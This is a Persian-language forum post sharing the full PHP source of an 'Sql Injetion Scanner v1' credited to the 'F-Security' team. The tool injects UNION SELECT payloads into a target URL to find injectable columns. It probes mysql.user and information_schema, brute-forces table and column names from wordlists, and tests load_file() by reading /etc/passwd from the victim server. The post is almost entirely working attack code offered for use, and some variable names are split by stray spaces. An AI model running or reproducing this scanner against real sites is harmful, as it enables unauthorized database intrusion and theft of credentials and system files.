SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Sql Injetion Scanner v1

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Sql Injetion Scanner v1

    [align=LEFT][align=CENTER]Sql Injetion Scanner v1[/align]
    [php]

    <?php
    @set_time_limit(0);
    /*
    F-Security - Sql InyeXion Scanner v1
    Desarrollado por Knet
    Adminitradores - www.remoteexecution.org
    Contacto:
    [email protected] [ Mail ]
    [email protected] [ Msn ]
    */
    $web=$_POST['web'];
    $end=$_POST['end'];
    $scann=$_POST['scann'];
    $union=$_POST['union'];
    $max=$_POST['max'];
    $from_format=$_POST['from'];
    $MySqluser=$_POST['MySqluser'];
    $InforMationSchema=$_POST['InforMationSchema'];
    $TblBrt=$_POST['TblBrt'];
    $TblFormat=$_POST['TblFormat'];
    $ColBrt=$_POST['ColBrt'];
    $ColFormat=$_POST['ColFormat'];
    $LdFl=$_POST['LdFl'];
    $string='err0r';
    $union_array=array(
    '-1+UNION+SELECT+',
    '-1\'+UNION+SELECT+',
    '-1+UNION+ALL+SELECT+',
    '-1\'+UNION+ALL+SELECT+',
    '-1/**/UNION/**/SELECT/**/',
    '-1\'/**/UNION/**/SELECT/**/',
    '-1/**/UNION/**/ALL/**/SELECT/**/',
    '-1\'/**/UNION/**/ALL/**/SELECT/**/',
    '1+UNION+SELECT+',
    '1\'+UNION+SELECT+',
    '1+UNION+ALL+SELECT+',
    '1\'+UNION+ALL+SELECT+',
    '1/**/UNION/**/SELECT/**/',
    '1\'/**/UNION/**/SELECT/**/',
    '1/**/UNION/**/ALL/**/SELECT/**/',
    '1\'/**/UNION/**/ALL/**/SELECT/**/'
    );
    $count_union_array=count($union_array) + 1;
    $from_array=array(
    '+from+',
    '/**/from/**/',
    '+FROM+',
    '/**/FROM/**/',
    '%20from%20',
    '%20FROM%20'
    );
    $count_from_array=count($from_array) + 1;
    $from=$from_array[$from_format];
    $iny_1=$union_array[$union];
    $iny_2='0x'.bin2hex($string);
    $iny_3='0x'.bin2hex($string);
    if($max<3 || $max=="" || !is_numeric($max))
    {
    $max=3;
    }
    ?>
    <form action="" method="POST">
    <table>
    <tr>
    <td><h1>Sql InyeXion Scanner F-Security Team</h1></td>
    </tr>
    <tr>
    <td>Web:
    <input id="boton" type="text" name="web" value="
    <?php if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>
    " size="60">
    </td>
    <td>Union*:
    <SELECT name="union" size="1" id="boton">
    <?php
    for($union_for=0;$union_for<=$count_union_array;$u nion_for++)
    {
    if($union_array[$union_for]!="")
    {
    echo '<OPTION VALUE="'.$union_for.'">'.$union_array[$union_for].'</OPTION>'."\n";
    }
    }
    ?>
    </SELECT>
    <td>Max columns:
    <SELECT name="max" size="1" id="boton">
    <?php
    for($max_a=1;$max_a<=255;$max_a++)
    {
    echo '<OPTION VALUE="'.$max_a.'">'.$max_a.'</OPTION>'."\n";
    }
    ?>
    </SELECT>
    </td>
    <td>eND:
    <input id="boton" type="text" name="end" value="
    <?php if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">
    </td>
    </tr>
    </table>
    <table>
    <tr>
    <td>From* Format:
    <td>
    <SELECT name="from" size="1" id="boton">
    <?php
    for($from_for=0;$from_for<=$count_from_array;$from _for++)
    {
    if($from_array[$from_for]!="")
    {
    echo '<OPTION VALUE="'.$from_for.'">'.$from_array[$from_for].'</OPTION>'."\n";
    }
    }
    ?>
    </SELECT>
    </td>
    </tr>
    </table>
    <table>
    <tr>
    <td>Test mysql.user:</td>
    <td>Yes</td>
    <td><input type="radio" name="MySqluser" value="S" checked></td>
    <td>No</td>
    <td><input type="radio" name="MySqluser" value="N"></td>
    </tr>
    <tr>
    <td>Test information_schema:</td>
    <td>Yes</td>
    <td><input name="InforMationSchema" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="InforMationSchema" value="N"></td>
    </tr>
    <tr>
    <td>Tables BruteForce:</td>
    <td>Yes</td>
    <td><input name="TblBrt" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="TblBrt" value="N"></td>
    <td>|</td>
    <td>tablename</td>
    <td><input type="radio" name="TblFormat" value="1" checked></td>
    <td>|</td>
    <td>TableName</td>
    <td><input type="radio" name="TblFormat" value="2"></td>
    <td>|</td>
    <td>TABLENAME</td>
    <td><input type="radio" name="TblFormat" value="3"></td>
    </tr>
    <tr>
    <td>Columns BruteForce:</td>
    <td>Yes</td>
    <td><input name="ColBrt" type="radio" value="S" checked="checked"></td>
    <td>No</td>
    <td><input type="radio" name="ColBrt" value="N"></td>
    <td>|</td>
    <td>columname</td>
    <td><input type="radio" name="ColFormat" value="1" checked></td>
    <td>|</td>
    <td>ColumName</td>
    <td><input type="radio" name="ColFormat" value="2"></td>
    <td>|</td>
    <td>COLUMNAME</td>
    <td><input type="radio" name="ColFormat" value="3"></td>
    </tr>
    <tr>
    <td>Test load_file():</td>
    <td>Yes</td>
    <td><input type="radio" name="LdFl" value="S" checked></td>
    <td>No</td>
    <td><input type="radio" name="LdFl" value="N"></td>
    </tr>
    <tr>
    <td><input id="boton" type="submit" name="scann" value="Scann"></td>
    </tr>
    </table>
    <table>
    <tr>
    <td>
    <?php
    if(isset($scann) && $web!="")
    {
    for($a_for=1;$a_for<=$max;$a_for++)
    {
    $iny_2=$iny_2.'2d'.bin2hex($a_for);
    $iny=$web.$iny_1.$iny_2;
    $webmas = $iny;
    $contenido = @file_get_contents($webmas.$end);
    $alert = strpos($contenido,$string);
    if(!$alert)
    {
    $iny_2=$iny_2.','.$iny_3;
    $iny_vuln .= $a_for.',';
    }
    else
    {
    $f_num=$a_for;
    $web_final=$web.$iny_1.$iny_vuln.$f_num;
    //echo $webmas;
    echo '[+] Bug Found in: '.$a_for."<br>".'<a href="'.htmlentities($web_final.$end).
    '" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>";
    echo 'vuln in num/s: |';
    /*********************************SALVANDO********* ******************************/
    $_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for.
    "<br>".'<a href="'.htmlentities($web_final.$end).
    '" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>".'vuln in num/s: |';
    /*********************************SALVANDO********* ******************************/
    $vulns=array();
    for($search_for=1;$search_for<=$a_for;$search_for+ +)
    {
    if(strpos($contenido,$string.'-'.$search_for))
    {
    echo $search_for.'|';
    /*********************************SALVANDO********* *************
    *****************/
    $_SESSION['all_saveds'] .= $search_for.'|';
    /*********************************SALVANDO********* *************
    *****************/
    array_push($vulns,$search_for);
    }
    }
    /*********************************SALVANDO********* ******************************/
    $_SESSION['all_saveds'] .= "<br>".'---------------------------------------------'.
    '------------------------------------------------'."<br>";
    /*********************************SALVANDO********* ******************************/
    echo "<br>".'---------------------------------------------'.
    '------------------------------------------------'."<br>";
    $a_for=$max;
    define('vuln','yes');
    }
    if(!$alert && $a_for==$max)
    {
    echo 'no vuln in 1->'.$max."\n";
    }
    $contenido='';
    }
    }
    /* FINAL SIMPLE SCANN */
    if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
    {
    $from_mysql_user=$from.'mysql.user';
    $contenido = @file_get_contents($webmas.$from_mysql_user.$end);
    $alert_mysql_user = strpos($contenido,$string);
    if($alert_mysql_user)
    {
    echo '[+] MySQL Database Found:'.'<br>';
    echo '<a href="'.htmlentities($web_final.$from_mysql_user.$ end).'" TARGET=BLANK>'.
    htmlentities($web_final.$from_mysql_user.$end).'</a>'."<br>";
    echo '[+] Columns default in mysql.user: Host,User,Password'.'<br>';
    }
    else
    {
    echo '[+] MySQL Database not Found:'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* FINAL Mysql.user TEST */
    if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S")
    {
    $from_information_schema=$from.'information_schema .tables';
    $contenido = @file_get_contents($webmas.$from_information_schem a.$end);
    $alert_information_schema = strpos($contenido,$string);
    if($alert_information_schema)
    {
    echo '[+] Information_Schema Database Found:'.'<br>';
    echo '<a href="'.htmlentities($web_final.$from_information_ schema .$end).'" TARGET=BLANK>'.
    htmlentities($web_final.$from_information_schema.$ end).'</a>'."<br>";
    echo '[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'<br>';
    echo '---------------'."<br>";
    echo '[+] Columns default in information_schema.columns:
    TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'.'<br>';
    }
    else
    {
    echo '[+] Information_Schema Database not Found:'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* FINAL information_schema database */
    if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat))
    {
    switch($TblFormat)
    {
    case 1:
    $file_txt_tables='1.txt';
    break;
    case 2:
    $file_txt_tables='2.txt';
    break;
    case 3:
    $file_txt_tables='3.txt';
    break;
    default:
    $file_txt_tables='1.txt';
    }
    $file_tables=@file($file_txt_tables);
    $count_tables=count($file_tables);
    for($t_for=0;$t_for<=$count_tables;$t_for++)
    {
    $file_tables[$t_for]=trim($file_tables[$t_for]);
    if($file_tables[$t_for] != "")
    {
    $from_table=$from.$file_tables[$t_for];
    $contenido = @file_get_contents($webmas.$from_table.$end);
    $alert_table = strpos($contenido,$string);
    if($alert_table)
    {
    echo '[+] Table Found: '.$file_tables[$t_for]."<br>";
    echo '<a href="'.htmlentities($web_final.$from_table.$end). '" TARGET=BLANK>'.
    htmlentities($web_final.$from_table.$end).'</a>'."<br>";
    /*
    echo 'webmas:'.$webmas.'<br>';
    echo 'webfinal:'.$web_final.'<br>';
    echo 'web:'.$web.'<br>';
    */
    if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat))
    {
    /************************************************** **************
    *******/
    switch($ColFormat)
    {
    case 1:
    $file_txt_columns='1.txt';
    break;
    case 2:
    $file_txt_columns='2.txt';
    break;
    case 3:
    $file_txt_columns='3.txt';
    break;
    default:
    $file_txt_columns='1.txt';
    }
    $file_columns=@file($file_txt_columns);
    $count_columns=count($file_columns);
    $count_vulns=count($vulns);
    $count_vulns = $count_vulns + 1;
    for($c_for=0;$c_for<=$count_columns;$c_for++)
    {
    $file_columns[$c_for]=trim($file_columns[$c_for]);
    if($file_columns[$c_for] != "")
    {
    for($cols_for=1;$cols_for<=$f_num;$cols_for++)
    {
    if(in_array($cols_for,$vulns))
    {
    if($cols_for != $f_num)
    {
    $cols_brt_string .= 'concat(0x'.bin2hex($string).
    ','.
    $file_columns[$c_for].'),';
    }
    else
    {
    $cols_brt_string .= 'concat(0x'.bin2hex($string).
    ','.
    $file_columns[$c_for].')';
    }
    }
    else
    {
    if($cols_for != $f_num)
    {
    $cols_brt_string .= $cols_for.',';
    }
    else
    {
    $cols_brt_string .= $cols_for;
    }
    }
    }
    $col_contenido=@file_get_contents($web.
    $iny_1.$cols_brt_string.$from_table.$end);
    $alert_col = strpos($col_contenido,$string);
    if($alert_col)
    {
    if($cols_vulns=="")
    {
    $cols_vulns =
    $file_columns[$c_for];
    }
    else
    {
    $cols_vulns .= ','.
    $file_columns[$c_for];
    }
    /*
    $cols_brt_string=str_replace('concat(0x'.bin2hex($ string).',','',
    $cols_brt_string);
    $cols_brt_string=str_replace(')','',
    $cols_brt_string);
    echo '[+] Column Found in '.
    $file_tables[$t_for].
    ': '.$file_columns[$c_for].'<br>';
    echo '<a href="'.
    htmlentities($web.
    $iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'.
    htmlentities($web.
    $iny_1.$cols_brt_string.$from_table.$end).'</a>'."<br>";
    */
    }
    $cols_brt_string='';
    }/**/
    }
    if($cols_vulns!="")
    {
    echo '[+] Column/s Found in '.$file_tables[$t_for].' : '.
    $cols_vulns.'<br>';
    $cols_vulns='';
    }
    /************************************************** **************
    *******/
    }
    echo '-------------------------------'."<br>";
    }
    }
    }
    }
    /* FINAL TABLE AND COLUMNS BRUTEFORCE */
    if(vuln=="yes" && isset($LdFl) && $LdFl=="S")
    {
    $string_alert_loadfile = 'root:x:';
    for($load_file_for=1;$load_file_for<=$f_num;$load_ file_for++)
    {
    if(in_array($load_file_for,$vulns) && load_file!="yes")
    {
    if($load_file_for != $f_num)
    {
    $load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.',';
    }
    else
    {
    $load_file_string .= 'load_file('.$load_file_for.')';
    }
    define('load_file','yes');
    }
    else
    {
    if($load_file_for != $f_num)
    {
    $load_file_string .= $load_file_for.',';
    }
    else
    {
    $load_file_string .= $load_file_for;
    }
    }
    }
    $web_load=$web.$iny_1.$load_file_string.$end;
    $contenido_load = @file_get_contents($web_load);
    $alert_load_file = strpos($contenido_load,$string_alert_loadfile);
    echo '[+] load_file(): ';
    if($alert_load_file)
    {
    echo 'ENABLED'.'<br>';
    echo '<a href="'.htmlentities($web_load).'" TARGET=BLANK>'.
    htmlentities($web_load).'</a>'."<br>";
    }
    else
    {
    echo 'DISABLED'.'<br>';
    }
    echo '-------------------------------'."<br>";
    }
    /* FINAL LOAD_FILE() TEST */
    ?>

    [/php][/align]
    [align=center][/align]
صبر کنید ..
X